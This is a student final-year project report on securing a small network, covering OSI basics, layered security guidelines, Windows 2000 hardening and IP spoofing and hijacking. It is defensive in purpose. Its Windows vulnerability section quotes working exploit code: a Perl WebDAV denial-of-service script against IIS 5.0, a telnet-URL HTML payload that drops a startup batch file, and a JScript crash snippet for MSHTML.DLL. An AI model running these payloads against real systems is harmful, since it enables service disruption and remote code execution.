Faculty of Engineering and Architecture Department of Electrical

And Computer Engineering

Final Year Project report for the 05/06 academic year

Project name: DFNZ 06 Network Security

Project advisor: Dr. Ali Hajj

Team members:

Antoine George Akiki Joseph Melhem Chaoul Jean Kamal Moukarzel

1

List of Figures and Tables .................................................................................................. 4 Abstract............................................................................................................................... 6 Introduction......................................................................................................................... 8 1. A Brief Overview of Networks................................................................................. 10

1.1 Network Symbols ............................................................................................. 10 1.2 Network Components ....................................................................................... 11 1.3 Network Structure............................................................................................. 13 1.4 OSI Model Overview........................................................................................ 14 1.5 Network Devices............................................................................................... 16

1.5.1 Hubs ................................................................................................................. 16 1.5.2 Switches/bridges .............................................................................................. 17 1.5.3 Routers and layer 3 switches ........................................................................... 18

2. Network Security Theory.......................................................................................... 19 2.1 Physical Layer Security .......................................................................................... 19 2.2 Hardware Layer Security ........................................................................................ 20 2.3 Application Layer Security..................................................................................... 21 2.4 Operating System Layer Security ........................................................................... 24

2.4.1 Windows 2000 Vulnerabilities and Solutions ................................................. 25 2.4.2 Increasing windows 2000 and XP security (refer to [7])................................. 29

2.5 Network Layer Security.......................................................................................... 34 2.5.1 TCP/IP – The Language of the Internet (refer to [12]).................................... 35 2.5.2 Attacks against IP (refer to [12]) ..................................................................... 35 2.5.3 IPSEC policy Architecture (refer to [13])........................................................ 38

2.6 Internal Network Security....................................................................................... 39 2.7 Survey of Most Common Threats........................................................................... 41

2.7.1 Attacks Automated by Malicious Codes ......................................................... 41 2.7.2 Hackers Attacks (not automated by malicious codes) ..................................... 48 2.7.3 DoS .................................................................................................................. 51 2.7.4 Social Engineering........................................................................................... 59

3. Our Network Design................................................................................................. 63 3.1 Topology................................................................................................................. 63 3.2 Securing the Perimeter............................................................................................ 64 3.3 Our Network ........................................................................................................... 68

4. Installing the Network .............................................................................................. 69 4.1 Plugging the Network and Creating a Domain....................................................... 70

4.1.1 Setting Up the Linksys Product ....................................................................... 70 4.1.2 Creating the Domain........................................................................................ 71

4.2 Tightening Security................................................................................................. 72 4.2.1 Patches on Windows........................................................................................ 72 4.2.2 Disabling USB ports to Protect Against Flash Drives..................................... 72

4.3 Creating Common and User Files........................................................................... 75 4.4 Scanning the Network and Updating Security........................................................ 75

4.4.1 Linux Tools...................................................................................................... 76 4.4.2 Windows Tools ................................................................................................ 76

4.5 Confusing the Hackers: Honey Pots ....................................................................... 77 4.5.1 What is a Honeypot.......................................................................................... 77

2

4.5.2 Classifications of Honeypots ........................................................................... 78 4.5.3 Review of most popular Honeypots................................................................. 82 4.5.4 Our selection and work .................................................................................... 91

4.6 User Logs................................................................................................................ 96 5. Countering the Attacks ............................................................................................... 106

5.1 First Attack ........................................................................................................... 106 5.2 Second Attack: Physical Attack............................................................................ 116

Conclusion ...................................................................................................................... 118 Reference ........................................................................................................................ 120 Appendix......................................................................................................................... 122

Appendix A................................................................................................................. 122 Appendix B: PortSentry.............................................................................................. 122 Appendix C: Timeline and Budget ............................................................................. 129

3

List of Figures and Tables

Figure 1.1: Networking facilitates the access of information (p11)

Figure 1.2: Hierarchal Structure of a Network (p12)

Figure 1.3: OSI layers (p14)

Figure 1.4: Workstations connected with a hub (p16)

Figure 1.5: devices connected with a switch (p16)

Figure 1.6: Typical connections of a router (p17)

Figure 2.1: A Wider View of Internet-connected Networks (p36)

Figure 3.1: Our Network Design (p41)

Figure 2.1: Classification of malicious code (p43)

Figure 2.3: Main types of viruses (p44)

Figure 2.4 Program File Virus (p46)

Figure 2.5: Logic Bomb (p51)

Figure 2.6: DoS (p52)

Figure 2.7: DDoS Attack (p53)

Figure 2.8: DRDoS (p54)

Figure 2.9 DRDoS Reflection (p55)

Figure 2.10: TCP 3 way handshake (p57)

Figure 2.11: Smurf Attack (p57)

Figure 3.1: Network Topologies (p62)

Figure 3.2: Our Network Design (p67)

Figure 4.1: Back Officer Friendly Detective (p79)

Figure 4.2: BOF screen capture showing spoofed services (p82)

4

Figure 4.3: BOF warnings (p82)

Figure 4.4: Specter GUI (p85)

Figure 4.5: A possible deployment of Decoy Server (p87)

Figure 4.6: Honeynet Architecture (p89)

Figure 4.7: Server application output format (p101)

Table 1.1: Network Symbol (p10)

5

Abstract Network security is a rising issue in all major businesses due to the increase in

sophistication and abundance of security breaches over the past decade. This is why

Deloitte & Touch, a major international auditing firm, proposed to AUB that a group of

graduating computer engineers work on the network security issue as the topic for their

Final Year Project. In this sense, preliminary meetings were arranged by Prof. Kayssi

(ECE Department Chairperson), and held with Mr. Saad Majari, an AUB graduate now

working for Deloitte’s IT department, so that we could be introduced to the company and

its interests concerning network security.

During these meetings, we agreed that two groups of three students each would work on

the topic. The two groups’ supervisor would be Prof. Ali el-Hajj, from the ECE

department. It was also decided that our group would handle setting up a network and

assuring it is secured in all ways possible. The other group of three would therefore have

the task to hack in our network, from the outside but also from the inside, in order to pin

point our network’s weaknesses. The output of this project would be proper

documentation relating all the steps taken to secure the network and dealing with the

attacks.

During the first stage of our Final Year Project, we performed an in depth literature

survey in order to get more acquainted with the subject. Reading material was provided

to us by Mr. Awad, Mr. Majari and by Mr. Brouwer, from Deloitte, in addition to white

papers and documents we found on the internet.

6

The material found relevant to our project is included in this report. Covered topics range

from: network specification and topology, overview of past and occurring security

breaches, security strategies for the different network layers, possible attacks, etc...

With these in depth information, we were able to set up our network in the second stage

of our FYP, and secure it by implementing the security strategies. We were given four

computers equipped with Pentium 2 processors. We thus installed one Windows 2000

server, one Windows 2000 workstation, one Fedora Server and one Fedora Workstation.

Finally, the third and final stage of our FYP was the “attacks” stage. The hackers’ team

attempted to attack our network externally and internally. A full list of documentation is

included in this report.

7

Introduction Our Final Year Project (FYP), entitled ‘Dfnz06’, is a project involving network security

and attacks. Throughout the academic year, two teams will challenge each others, one

being the security team (our team) and one being the hacking team. The project was

proposed and will be supervised by Deloitte, in cooperation with Pr. Ali Hajj from the

ECE department.

Security of Networks and information systems in general, is essential to businesses that

need to connect to the internet and keep their data safe. It is also essential within the

business, when employees are given specific roles and privileges, which define what part

of the information they can read and/or write.

In this sense, it is important for a business to build a well-secured Network. In doing so,

many factors are to be taken into consideration, as we are tackling a multi-disciplinary

field, who nonetheless must be treated as a whole [1].

The task that was assigned to us was to build a small network, just as small and medium

size businesses (SMB) would do, and document all the guidelines and steps that were

followed to secure this network. In this way, the resulting document could be used as a

reference for students, faculty, but also professionals wanting to learn about the safe

measures that should be taken in order to have a protected network.

However, it does not stop here. It is common practice amongst engineers to test every

design they do. In the case of our FYP, the testing will be a real life situation. Another

group of students will try to hack in our network, from the outside (by connecting to our

firewall), and from the inside (they will be given an account with limited privileges and

8

will try to bypass it). In this way, not only the steps in designing the network will be

documented, but also the measures to be taken when a breach of security is identified.

This report gives an account of what has been done in our FYP during the whole

2005/2006 academic year.

It starts by given a brief overview of networks, as it is essential to fully understand the

way a network operates in order to secure it. It then presents what can be regarded as a

literature survey: a summary of all the information relevant to network security design

that we will be using while building the network. As was stated earlier, many factors

should be taken into consideration such as: the physical layer, the hardware layer, the

application layer, the operating system layer and the network layer. It is also important to

know the enemy when trying to defend a network: therefore, a survey of the most

common threats and how they should be dealt with is presented in this report. Moreover,

this report presents our design: the network we built and its specifications (documenting

the steps taken while building). Finally, the last part of this report is a detailed

documentation of the attacks performed by the hackers’ team and the ways by which we

dealt with such attacks.

9

1. A Brief Overview of Networks

This section presents a review of internetworking terminology, such as the Open System

Interconnection (OSI) reference model and how the layers in the OSI operate. Moreover,

this section gives a brief overview of the devices that are used to support different

network requirements.

1.1 Network Symbols

The following symbols will be used throughout this report to illustrate various network

devices. All graphic are courtesy of Cisco Systems.

10

Router

Firewall

Switch

Workstation

Bridge

Server

Hub

Table 1.1: Network Symbols

1.2 Network Components

The primary purpose of Networks is to enable easy access of information regardless of

place, time, and type of computer system [2].

11

Figure 1.1: Networking facilitates the access of information [2] As can be seen in the figure above, the big company network is subdivided into the

following network components:

• The Main Office: everyone in this office in connected via a LAN (Local Area

Network). The company’s servers (and hence vital information) are located and

connected via this same LAN.

• A Branch Office: information from the main office’s server can be accessed

remotely (via a multitude of ways: leased line, Virtual Private Network,

Internet…). In this way, although physically far, the branch office seems part of

the main office’s network.

• A Home Office: Employees can work from their homes, with most likely on-

demand connections to the main office (or even the branch office). In this way, an

12

employee working from home can access information from the company’s servers

and use the network’s resources.

• Mobile Users: These are individuals who connect to the main office’s LAN

wherever they are (by a multitude of means, most likely on-demand connection

using phone lines).

The fact that the main office’s LAN in connected to the internet and to other network

components (like the branch office) makes it important to have a secure design. In this

way, vital information will not fall into the wrong hands and the company’s privacy will

be preserved.

1.3 Network Structure

In general, and in almost every enterprise, networks are structured in a hierarchal way:

Access Layer

Distribution Layer

Core Layer

Figure 1.2: Hierarchal Structure of a Network The access layer of the network, also referred to as the desktop layer, is the point on

which end users are connected to the LAN. In other words, the access layer is any end-

station’s entry point to the network. Sometimes, end users are placed in group according

13

to which resources they need to access the most. Most of the time, when a user needs to

use the printer, or access a server or use the internet; his traffic is directed to the

distribution layer.

The distribution layer, also referred to as the workgroup layer, is the link between the

access layer (hence the users) and the “motorway” [2] of the network, i.e. the core. The

main function of the distribution layer is to perform vital packet manipulation such as:

• Routing,

• Filtering,

• WAN access…

In brief, the distribution layer can be regarded as the policy controller: it determines if

and how packets can access the core. It also determines the fastest way for a user to

access the servers. In any case, once the layer in question decides of the path, it forwards

the request to the core layer.

The main purpose of the core layer, also referred to as the backbone, is to switch traffic

as fast as possible. It also provides quick transport to what is called enterprise services: e-

mail, videoconferencing and most importantly Internet.

1.4 OSI Model Overview

The OSI model is the conceptual framework of how networks are built and operate. As

the figure below illustrates, the OSI model has seven layers:

14

Figure 1.3: OSI layers [2]

The four lower layers define ways for end stations to connect to each others in order to

exchange data. The three upper layers define the way applications (within the end

stations) communicate with each others and with the users. In more details, the roles of

each layer are:

• Application layer: layer at which user interacts with the computer. Protocols at

this layer determine available resources, define communication partners and

synchronize all communication.

• Presentation layer: ensures that information sent by application layer of one end

station will be readable by the application layer of another end station operating

on another system. This is done by encryption for example.

• Session layer: establishes, manages and terminates communication sessions

between presentation layers.

15

• Transport layer: this layer distinguishes between upper layer applications, and

establishes end-to-end connectivity between them. It also defines flow control and

provides reliable or unreliable services for data transfers.

• Network layer: this layer defines the logical source and destination addresses

associated with a specific protocol. It also defines the different paths that exist

through the network and interconnects multiple data links. Note the routers and

layer 3 switches operate at this layer.

• Data-Link layer: this layer defines the physical source and destination addresses,

the network topology. It also supports frame sequencing and flow control. Note

the switches operate at this layer.

• Physical layer: this layer is the most basic of all; it defines the media type,

connector type and signaling type. In other words, this layer specifies the

electrical, mechanical, procedural and functional requirements for activating, de-

activating and maintaining the physical link between end systems. Note that hubs

and bridges operate at this layer.

1.5 Network Devices

1.5.1 Hubs

Hubs operate at the physical layer. This implies that all devices are in the same broadcast

domain and the same collision domain. The devices also share bandwidth. In other words,

devices connected to a hub communicate with each others as if they were on the same

segment. The hub connecting them does not manipulate or view the traffic exchanged.

16

Figure 1.4: Workstations connected with a hub

1.5.2 Switches/bridges

Layer 2 switches (i.e. switches) or bridges operate at the data-link layer. Each segment

connected to a port in the switch has its own collision domain, but all segments are in the

same broadcast domain.

The switch hears every frame that crosses a segment and determines whether it has to

copy it to another segment by looking at the destination address and checking in its MAC

table.

Figure 1.5: devices connected with a switch

17

1.5.3 Routers and layer 3 switches

Routers and layer 3 switched operate at the network layer. They can control broadcasts

and multicasts, they determine the optimal path a frame should take, and they manage

traffic. Usually, routers are the networks doorway to the internet or to a bigger WAN.

Internet Other LAN

Figure 1.6: Typical connections of a router

18

2. Network Security Theory

Now that we have a brief, but precise and clear understanding of how a network operates,

it is time to tackle the security aspect. How is a network secured from the outside and

from within? What are the different fields that come into play? All those questions were

answered by our researches. Although we have come across a lot of readings, we hereby

present the information we judged to be the most essential and relevant to our project.

Security is multi-dimensional: it spans through different layers. Throughout this section

we will discuss the security of: the physical, hardware, application, operating system and

network layers. Moreover, this section will give the principle rules and guidelines to

secure a network from the inside.

2.1 Physical Layer Security

Physical security is often viewed as the first line of defense of a system [1]. It forbids the

intruder to access the system physically (to sit and access information on an already

logged in computer).

Applying physical layer security to our FYP gives us the following guidelines:

• A person of our team should always be present whenever a computer is logged in.

Logged in computers should never be left unattended.

• If possible, access to the room where our network is located (Khaled JouJou’s

lab), should be controlled and banned to those who do not have business there.

Moreover, the switch and firewall should not be accessible to members outside

the team. If this is not possible, users should be restricted to log in only on certain

19

systems, whether they be identified by MAC addresses (see further sections) or a

hostname. Security can also be enhanced by allowing them to access only during

certain times for example.

• The team should adopt a clear desk policy: vital documents should be stored on

CDs or USB keys, and should not be kept unattended (lock in drawers, take away

home…).

• A proper inventory of all the equipment we have should be done, and no device or

machine should be unplugged and taken away without a reason.

• Our network should be protected against power failures and climate hazards (this

should not be a problem in Mr. Joujou’s labs).

On a larger enterprise scale, other measure can be taken to increase the physical security

of the system: biometrics can be used for ID purposes, visitors should not be left

unattended, server rooms should be equipped with appropriate monitoring devices

(cameras for example), guarded by appropriately trained personnel, or secured with key-

card access doors.

2.2 Hardware Layer Security

There are two aspects of hardware security, the first one consists of security at the

hardware level in CPUs, and the second one consists of hardware security at the level of

the enterprise and the users [1]. An example of a security issue at the CPU level is the

interrupt handling. The interrupt vector table is a target for hackers that are able to exploit

the system vulnerabilities at the lower level.

As for hardware security at the level of the enterprise, the following guideline should be

implemented in our FYP:

20

• Access to a server or a workstation’s bios should be protected by a password

(which only the administrator knows). In this way, a user will not be able to take

control of the machine in addition to accessing data that he would otherwise not

be able to retrieve (given his privileges).

• Appropriate bios configuration should be done to limit drive boot sequence to the

OS drive. A user should not be able to boot from other drives such as floppies or

CDs. Also, by forcing to workstation to only boot from the OS drive, installation

of software or new operating systems will be denied.

• Configurations of routers and/or switches should be password protected.

On a larger enterprise scale, it is also important to protect the access to printers by a

password. Otherwise, a hacker can change a printer’s configuration and reroute printer

outputs to other destinations (theft of information).

2.3 Application Layer Security

Application layer security is very important since it involves entrance of data [1]. The

application layer consists of software and database development mainly. The threats at

this layer are: buffer overflows, backdoors, incompleteness of data and viruses. There are

specific guidelines we will be following to achieve security at this layer.

• Users should be limited to having only one active session with the applications

and the network. In this way, accountability of users is enhanced.

• Users should have identifiable usernames that follow the same pattern for all (ex:

the AUB usernames are composed of the users’ initials). Logs should be entered

in a database and queries can be used to retrieve specific information.

21

• A list of unauthorized software should be established, to prevent users from

installing any undesired, dangerous software (it is recommended to ban user from

installing any software).

• Highly sensitive data should be encrypted before being stored. In this way,

reading or writing such data is more difficult.

• Any software upgrade should be installed in time. However, it is recommended to

test these upgrades and look for any patches that could enhance security.

• Initial passwords should be given to users after being generated in a random way.

• Some password conditions should be set: passwords should not be the same as the

usernames, or the user’s department for example. They should be at least 6 (or 8

in sensitive cases) characters long, and include combinations of letters and

numbers. In this way, guessing of password is almost impossible and cracking

them is a lengthy process for hackers.

• If a user tries to access his account with no results (the password entered is

incorrect), his account should be blocked after 3 trials. Only the administrator

should have the power to unblock the account.

• When the administrator changes the privileges of a user (after a promotion or a

demotion for example), the user should automatically be logged off and asked to

log in again. Moreover, if a user account is deleted, the user should also be logged

of (to prevent this user of doing unnecessary and dangerous operations when in

fact, he’s not allowed to). In this way, user accountability and responsibility is

enforced.

22

• The user profile should be complete and informative. In a company for example,

it should include the department of the user, his ranking, etc. To force the user to

fill in vital information in his profile, some fields should be made obligatory. In

this way, if ever the user’s information is needed, it will be complete and clear

and accountability is thus enforced.

The biggest threat resulting from many applications is their vulnerability to "buffer

overflow" attacks which usually results in the hacker having access to the system with the

rights of whatever user account the application was running under.

The following are some general guidelines related to applications:

• More secure equivalents for insecure applications should be used (ex: ssh

instead of telnet, since telnet is inherently insecure due to the fact that

passwords are transmitted over the wire as clear text).

• Applications should be kept up-to-date with the latest versions. Many

releases are specifically developed to address security issues.

• Ports that an application opens up should be determined and closed if they

are not absolutely necessary.

• The application vendor's Web site should regularly be checked for

information on how to make the application more secure and for any news

items or patches that address newly-discovered security vulnerabilities.

23

• In the case of a Web server, proper programming techniques can ensure

that CGI scripts are secure.

• Also in the case of a Web server, if Web page updates are fairly

infrequent, a floppy disk may be used to "sneaker-net" the updated HTML

files by logging into the console as root, mounting the floppy disk,

copying the files into the DocumentRoot directory, and then unmounting

the floppy. Doing so would eliminate the need to run an ftp server service

and enabling an account for the person who maintains the pages.

2.4 Operating System Layer Security

As will be seen in the next section of this report, the computers we were provided with

have Pentium2 processors. We therefore decided to install Windows2000 on them, since

WindowsXP would be too slow, as well as Fedora. This section aims to present the

vulnerabilities and protection schemas for Windows2000 Operating System and Linux

OS.

Hardening the operating system involves many things that are not only operating system-

specific, but may often vary from one "flavor" of an operating system to another. Typical

steps, whatever the OS, include:

• Disabling all default accounts and groups that are not needed. When an

operating system is installed it sets up quite a few user accounts and

groups by default (like the guest account, or other application accounts).

24

• The startup configuration can be changed so that only necessary services

are running. Many services open TCP/IP "ports" which hackers find when

running port scans against systems. Thus, closing all unnecessary ports by

disabling unnecessary services or application is a common practice.

• Server consoles that are not being used should be logged off. This is of

particular importance for Internet-connected systems.

2.4.1 Windows 2000 Vulnerabilities and Solutions

Microsoft IIS 5.0 WebDAV 'Search' Denial of Service is a vulnerability that was

published in March 16, 2001. WebDAV contains a flaw in the handling of

unusually long requests, submitting a valid yet unusually long WebDAV 'search'

request could restart the IIS services and possibly cause the server to stop

responding. The following exploit has been provided by Georgi Guninski [4]:

#!/usr/bin/perl use IO::Socket; print f "IIS 5.0 SEARCH\n wait some time\n"; if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; } $port = @ARGV[1]; $host = @ARGV[0]; sub vv() { $ll=$_[0]; #l ength of buffer $ch=$_[1]; $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return; $over=$ch x $ll; #string to overflow $xml='<?xml version="1.0"?><D:s earchrequest xmlns:D="DAV:"><D:sql>SELECT DAV:displayname from SCOPE("'.$over.'")</D:sql></D:searchrequest>'."\n"; $l=length($xml); $req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent -length: $l\n\n$xml\n\n"; syswrit e($socket,$req,length($req)); print "."; $socket->read($res,3000); print "r=".$res;

25

close $socket; } do vv(126000,"V"); sleep(1); do vv(126000,"V"); #Try 125000 – 128000

Solution :

Microsoft patch Q291845_W2K_SP2_x86_en

http://download.microsoft.com/download/win2000platform/Patch/q291845/NT5/

EN-US/Q291845_W2K_SP2_x86_en.EXE

Microsoft IE 5.01/ 5.5 Telnet Client File Overwrite is a vulnerability that was

published on March 09, 2001. Services for Unix 2.0 contains a client side logging

option which records all information exchanged in a telnet session. A

vulnerability exists that could enable a remote user to invoke the telnet client and

execute arbitrary commands on a target machine via IE. This is achieved by

crafting a URL composed of command line parameters to the telnet client, which

would invoke 'telnet.exe'. Telnet would connect to the host and initiate the

logging of session information, access to this file will allow an attacker to write

and execute arbitrary commands which may be executed later.

The following exploit has been provided by Oliver Friedrichs [4]:

telnet:-f%20\ fil e.txt%20host

The following is an example of a malicious HTML message which could cause data that is received

from the destination port on the host "host" to be writt en to the file "fil ename" in the startup di rectory

for all users. If the logged in user has the appropri ate permissions, a bat ch file will be created and

executed upon future authentication.

<html>

26

<frameset rows="100%,*"> <frame src=about:blank> <frame src=telnet:-f%20\Documents%20and%20Settings\All%20Users\start%20menu\programs\st artup \start.bat%20host%208000> </frameset> </html> Solution

Microsoft has released a patch which rectifies this issue:

http://www.microsoft.com/windows/ie/download/critical/q286043/default.asp

Microsoft Outlook vcard Buffer Overflow is a vulnerability that was published on

February 22, 2001. Due to an unchecked buffer in Microsoft Outlook, it is

possible for a remote user to execute arbitrary code on a victim's machine. If a

maliciously crafted .vcf file containing malformed data in the 'Birthday' field is

sent as an attachment and executed, the maliciouslyembedded code could be run

on the recipient's machine. An exploit has been provided by Ollie Whitehouse [5].

A solution is also provided by a windows patch:

http://www.microsoft.com/windows/ie/download/critical/q283908/default.asp

Windows 2000 EFS Temporary File Retrieval Vulnerability was published on

January 19, 2001. EFS is the encrypted file system package designed to secure

sensitive information. It is included with the Windows 2000 Operating System,

distributed and maintained by Microsoft Corporation. A problem in the package

could allow the recovery of sensitive data encrypted by the EFS. When the file is

selected for encryption and backup copy of the file is moved into the temporary

directory using the file name efs0.tmp. The data from this file is taken and

27

encrypted using EFS, with the backup file being deleted after the encryption

process is performed. However, after the file is encrypted and the file is deleted,

the blocks in the file system are never cleared, thus making it possible for any

user on the local host to access the data of the encrypted file, which falls outside

of the constrains of access control imposed by the Operating System. This makes

it possible for a malicious user to recover sensitive data encrypted by EFS.

Microsoft WINS Domain Controller Spoofing Vulnerability was published on

January 17, 2001. Windows Internet Naming Service (WINS) ships with

Microsoft Windows NT Server. WINS resolves IP addresses with network

computer names in a client to server environment. A distributed database is

updated with an IP address for every machine available on the network.

Unfortunately WINS does not properly verify the registration of domain

controllers. It is possible for a user to modify the entries for a domain controller,

causing the WINS service to redirect requests for the DC to another system. This

can lead to a loss of network functionality for the domain. The DC impersonator

can also be set up to capture username and password hashes passed to it during

login attempts. An exploit has been provided by David Byrne [6], and a

workaround by Paul Schmehl [4].

Microsoft MSHTML.DLL Crash Vulnerability was published on January 15,

2001. MSHTML.DLL is the shared library for parsing HTML in Internet Explorer

and related applications. It may be possible for an attacker to crash this library

remotely and cause a denial of service with special Jscript code. This bug involves

Jscript's ability to handle multiple window objects. If a window object is deleted

28

after it receives data and then re-initalized, the library will reportedly crash. This

behavior has been attributed to a stack overflow by its discoverer. It is reportedly

not exploitable in any way that may permit an attacker to gain access to the victim

host. The following exploit has been provided by Thor Larholm:

<iframe id=test style="display:none"></iframe> <script> Larholm = {}; // Object literal test.document.open(); // Stream data test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>"); delete Larholm; Larholm = {}; // Crash </script>

2.4.2 Increasing windows 2000 and XP security (refer to [7])

Editing the registry and disabling services can lead to problems. We must backup

before we change any setting and change only one setting at a time.

- Registry settings are edited with a program call regedit32. Click on the Start Menu >

run > type regedt32

Services are turned on and off by the services.msc. Clock on the Start Menu > Run > type

services.msc

Null sessions allow unwanted users to gain access to our computers, they are

opened on NetBios ports 139 and 445. NetBios is Windows' default protocol for "File and

Print Sharing." With automated tools, hackers will gain access to crucial system

information such as accounts and passwords. NULL sessions are a built in

communication share using an anonymous user and a NULL password on the NetBios

port. The easiest way to stop NULL session is by disabling "File and Print Sharing" on

29

all network devices. In order to do so on Windows 2000 go to Control Panel > Network

and Dial-up Connections and select the proper connection.

If these services are required then we will:

- make a registry entry to protect from sending sensitive data through the NetBios

port.

- Open regedt32 from the Run Menu.

- Select HKEY_LOCAL_MACHINE > System > CurrentControlSet > Control >

LSA.

- The key we want to edit is RestrictAnonymous.

- We will change the value to a 1 or 2. A setting of 1 indicates that null

connections are allowed but sensitive data is blocked being sent via the

connection (only option available in NT4). A setting of 2 will disallow any NULL

connections; this may conflict with some 3rd party software. There are a few

hacking tools that will work on a level 1 setting and retrieve information. Reboot

the machine when done.

Another way to prevent access to port 139 is to disable NetBIOS over TCP/IP.

Windows will cascade to port 445 to respond to NULL sessions and other

requests.

Disable SNMP services

30

If null sessions are disabled, another easy way to gain system information is through

public SNMP. SNMP permits the monitoring and managing of a network from a single

workstation or several workstations, called SNMP managers. It's a family of

specifications that provide a means for collecting network management data from the

devices residing in a network. With an SNMP manager, you can query the network's

devices regarding the nature of their functions.

If there are no programs using SNMP, we can disable this service. This is the easiest way

to protect against hacks and free up some memory.

If SNMP access is needed, then we set SNMP not to run in a public mode:

- Open the registry editor.

- Go to HKLM > System > CurrentControlSet > Services > SNMP > Parameters >

ValidCommunities.

- Select Security> Permissions and change them to permit only approved users

access.

There is one more step to disabling public access to SNMP.

- Go to HKLM > System > CurrentControlSet > Services > SNMP > Parameters >

ExtensionAgents and delete the value that contains the

LANManagerMIB2Agent. Then rename the other entries to update the

sequence, ie. 2, 3 etc. until the sequence begins with a 1.

31

Disable unused services since they take up space and allow hackers to attack

through the ports they leave open. We should disable messenger if not used since they

give the hacker system rights

Local Security Policy Tips: To edit Windows 2000 or XP's Local Security

Policy follow the following path:

- Start > Administration Tools > Local Security Policy. The Local Security editor has the

same feel as the registry editor.

-Always set a password for the Administrator account .

- Set the password to 6 or more characters, Account Policies > Password Policy >

Minimum Password Length.

Ensure passwords use a combination of letters and numbers

To enable this setting enable Account Policies > Password Policy > Password

Must Meet Complexity Requirements.

Enable Account Lockout Period

Account Lockout Duration

Require users to change their passwords

Account Lockout Threshold

Account Lockout Threshold

Account Tips: The more accounts on a computer the more entry points attackers

can try. Default accounts will always get us into trouble because the attacker does not

32

have to guess a user name. We must always disable the guest account if it is not needed.

Their are tools that will allow an attacker to create accounts with Administrative

privileges on an unpatched Windows 2000 system .We must not login as administrator if

we do not need to. Viruses or malicious scripts will try to run programs or modify

registry settings. If the user does not have access to perform these tasks than the

malicious script cannot either.

Terminal Services : 128 bit encryption must be used to avoid packet sniffers.

Change terminal services to log users off. If a session is left open a hacker might enter

that person's session. Another safety measure with terminal services, change the port

from the default port of 3389. If you want to learn how to perform this edit refer to

appendix A. This method will not really stop attacks, just avoid attackers doing a quick

scan or targeting port 3389.

Disable DNS Transfers - If using active directory limits DNS zone transfers.

Attackers are allowed to scan the network and gain information of IP addresses and ports.

While there is no damage to our system by performing these scans, attackers can learn a

lot about your network. To disable go to:

- Start > Programs > Administrative Tools > Computer Management > Services and

Applications > DNS > [server] > Forward Lookup Zones > [zone_name] > Properties.

-Add the IP addresses that are on your network. The best option is to disable zone

transfers by unchecking Allow Zone Transfers.

Port Scanners are very useful tools for finding ports open on our system or

network. Here are a couple we might try, SuperScan, NetScanTools Pro, GFI, and NMap.

33

2.5 Network Layer Security

Network Layer Security among mutually trusting hosts is a relatively straightforward

problem to solve. The standard protocol technique, employed in IPSEC, involves

"encapsulating" an encrypted Network Layer packet inside a standard Network packet,

making the encryption transparent to intermediate nodes that must process packet headers

for routing, etc. Outgoing packets are authenticated, encrypted, and encapsulated just

before being sent to the network, and incoming packets are decapsulated, verified, and

decrypted immediately upon receipt. Key management in such a protocol is similarly

straightforward in the simplest case. Two hosts can use any key-agreement protocol to

negotiate keys with one another, and simply use those keys as part of the encapsulating

and decapsulating packet transforms.

In many applications, security at the network later has a number of advantages over

security provided elsewhere in the protocol stack. Network semantics are usually hidden

from applications, which therefore automatically and transparently take advantage of

whatever network layer security services their environment provides. Especially

importantly, the network layer offers a remarkable flexibility not possible at higher- or

lower- abstractions: security can be configured end-to-end (protecting traffic between two

hosts), route-to-route (protecting traffic passing over a particular set of links), edge-to-

edge (protecting traffic as it passes between "trusted" networks via an "untrusted" one),

or in any other configuration in which network nodes can be identified as appropriate

security endpoints.

34

2.5.1 TCP/IP – The Language of the Internet (refer to [12])

TCP/IP (Transport Control Protocol/Internet Protocol) is the ``language'' of the Internet.

Anything that can learn to ``speak TCP/IP'' can connect to the Internet. This is

functionality that occurs at the Network (IP) and Transport (TCP) layers in the ISO/OSI

Reference Model. Consequently, a host that has TCP/IP functionality (such as Unix,

OS/2, MacOS, or Windows NT) can easily support applications (such as Netscape's

Navigator) that uses the network.

As noted, IP is a ``network layer'' protocol. This is the layer that allows the hosts to

actually ``talk'' to each other. Such things as carrying datagrams, mapping the Internet

address (such as 10.2.3.4) to a physical network address (such as 08:00:69:0a:ca:8f), and

routing, which takes care of making sure that all of the devices that have Internet

connectivity can find the way to each other.

2.5.2 Attacks against IP (refer to [12])

A number of attacks against IP are possible. Typically, these exploit the fact that IP does

not perform a robust mechanism for authentication for the source of the packet. This is

not necessarily a weakness by definition , but it is an important point, because it means

that the facility of host authentication has to be provided at a higher layer on the ISO/OSI

Reference Model. Today, applications that require strong host authentication (such as

cryptographic applications) do this at the application layer.

IP Spoofing

This is where one host claims to have the IP address of another. Since many systems

(such as router access control lists) define which packets may and which packets may not

35

pass based on the sender's IP address, this is a useful technique to an attacker: he can

send packets to a host, perhaps causing it to take some sort of action.

Additionally, some applications allow login based on the IP address of the person making

the request (such as the Berkeley r-commands ). These are both good examples how

trusting untrustable layers can provide security that is considered weak.

IP Session Hijacking

This is a relatively sophisticated attack, first described by Steve Bellovin. It is very

dangerous, however, because there are now toolkits available in the underground

community that allow even inexperienced hackers to perform this attack. IP Session

Hijacking is an attack whereby a user's session is taken over, being in the control of the

attacker. If the user was in the middle of email, the attacker is looking at the email, and

then can execute any commands he wishes as the attacked user. The attacked user simply

sees his session dropped, and may simply login again, perhaps not even noticing that the

attacker is still logged in on his account.

For the description of the attack, refer to the large network of networks in Figure 2.1.

36

Figure 2.1: A Wider View of Internet-connected Networks

In this attack, a user on host A is carrying on a session with host G. Perhaps this is a

telnet session, where the user is reading his email, or using a Unix shell account from

home. Somewhere in the network between A and G sits host H . The person on host H

watches the traffic between A and G, and runs a tool which starts to impersonate A to G,

and at the same time tells A to shut up, perhaps trying to convince it that G is no longer

on the net (which might happen in the event of a crash, or major network outage). After a

few seconds of this, if the attack is successful, host H has ``hijacked'' the session of our

user. Anything that the user can do legitimately can now be done by the attacker,

illegitimately. As far as G knows, nothing has happened.

This can be solved by replacing standard telnet-type applications with encrypted versions

of the same thing. In this case, the attacker can still take over the session, but he'll see

only ``gibberish'' because the session is encrypted. The attacker will not have the needed

37

cryptographic key(s) to decrypt the data stream from G, and will, therefore, be unable to

do anything with the session.

2.5.3 IPSEC policy Architecture (refer to [13])

Let us examine the architecture of Network Layer Security more closely, using IPSEC as

a specific example. In this environment, policy must be enforced whenever packets arrive

at or are about to leave a Network Layer endpoint (which could be an end host, a

gateway, a router, or a firewall). When an incoming packet arrives from the network , the

security endpoint first determines the processing it requires:

- If the packet is not protected, should it be accepted? This is essentially the "traditional"

packet filtering problem, as performed, e.g., by network firewalls.

